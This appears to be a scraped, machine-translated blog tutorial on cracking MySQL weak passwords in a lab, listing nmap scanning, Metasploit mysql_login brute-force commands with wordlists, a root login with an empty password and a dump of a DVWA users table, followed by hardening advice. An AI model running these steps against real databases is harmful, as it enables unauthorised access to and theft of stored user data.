当前位置:网站首页>6-21 vulnerability exploitation MySQL weak password cracking
6-21 vulnerability exploitation MySQL weak password cracking
2022-07-29 02:44:00 【Mountain Rabbit 1】
mysql Introduce
Mysql Is a relational database management system , The Swedish MySQL AB Companies to develop , At present belongs to the Oracle Its products .Mysql Is one of the most popular relational database management systems , stay WEB Application aspect ,mysql It's the best RDBMS(Relational Database Management System, Relational database management system ) Application software .
Each paragraph is stored in a table , The corresponding combination of multiple tables , Store the corresponding data , Internal key 、 Foreign keys 、 Unique index , Different values , There are corresponding connections , This is the outline of our relational database
Mysql Is a relational database management system , Relational databases keep data in different tables , Instead of storing all the data in a big warehouse , Non relational database ,mydbs、mongdb, Store data in large memory , Instead of storing it in a large table , They have no concept of table , Store in table , Is to improve the speed of search , And it has more flexibility
We can do it in mysql Official website , see mysql Information about :https://www.mysql.com/
Target detection mysql
Use nmap -sV -p 3306 IP Address , Default mysql Is running on the 3306 Of , Target detection mysql Version information .
nmap -sV -p 3306 192.168.42.137
msf Crack mysql password
Use msf Under the mysql_login Module cracking mysql Login username and password
msfconsole
use auxiliary/scanner/mysql/mysql_login
show options
set rhosts 192.168.1.105
show options
set user_file /home/kali/Desktop/user.txt
set pass_file /home/kali/Desktop/PASS.txt
show options
run
When we get it mysql After the user name and password , We can log in to mysql client , To view the database , Stored data
Log in to the database to view the data
Use mysql -h IP Address -u root Log in to the database system
mysql -h 192.168.1.105 -u root
show databases;
use dvwa;
show tables;
select * from users;
The above is the user name we cracked , Log in to the database , View the data
The reason why we can crack successfully , Because our database user name is too simple , User name used root This user , And the password is empty , Or other simple passwords , Are easy to crack , This is the time , We need to defend against such detection , You need to change the user name and password , The design is complicated , Make it not so easy to crack , And you can design thresholds , When we log in three times by mistake , Will block the corresponding IP, Limit login to ten minutes , In this way, it can't be cracked very quickly , It can't even be cracked , We can modify it mysql Default port ,3306, Design it into other ports , Confuse our detection , meanwhile , We don't allow mysql Outreach , Only through 127.0.0.1 Make local connections , Otherwise, do not connect , Or specify specific IP Address , Connect , Not arbitrary IP Can be connected to mysql On
边栏推荐
- Ffmpeg+sdl+qt is a simple video player
- 0728~面试题梳理
- What are the TCP retransmission mechanisms?
- FPGA skimming memory (Verilog implementation of ram and FIFO)
- 一款好看的iapp捐赠榜单源码
- When I look at the source code, what am I thinking?
- ES6详解 快速上手!
- QT screen adaptive automatic layout, drag the window to automatically grow larger and smaller (I)
- Exploration and practice of network security vulnerability management
- Source code and display of 18 classic programs in C language vs2019
猜你喜欢
Workflow of wireless vibrating wire acquisition system
Esbuild Bundler HMR
快速掌握Nodejs安装以及入门
网络基础概论
漫画算法_小灰灰面试
Where, having, group by, order by, is null, not in, subquery, delete, date function
3D intelligent factory process flow visualization interactive display application advantages
I was stunned by this question that I browsed 746000 times
《微信小程序-进阶篇》Lin-ui组件库源码分析-Button组件(二)
6 years of testing experience, teaching you how to test ~ how to control the project
随机推荐
新版海螺影视主题模板M3.1全解密版本多功能苹果CMSv10后台自适应主题开源全解密版
I want to talk about high concurrency.
QT qstringlist usage
Redis master-slave mode, sentinel cluster, fragment cluster
第八天笔记
无线振弦采集系统工作流程
Double write consistency of MySQL and redis
MySQL基本操作和基于MySQL基本操作的综合实例项目
以科技传递温度,vivo亮相数字中国建设峰会
OSPF实验
Where, having, group by, order by, is null, not in, subquery, delete, date function
What happens if you have to use ArrayList in multithreading?
where、having、group by、order by,is null,not in,子查询,delete,日期函数
Virsh console connection failure
7/28 Gauss elimination to solve linear equations + Gauss elimination to solve XOR linear equations + find the combination number II
代码实现 —— 多项式的最大公因式(线性代数)
Master-slave replication and its principle
物联网组件
Multimodal unsupervised image to image translation
手把手教你安装VSCode(附带图解步骤)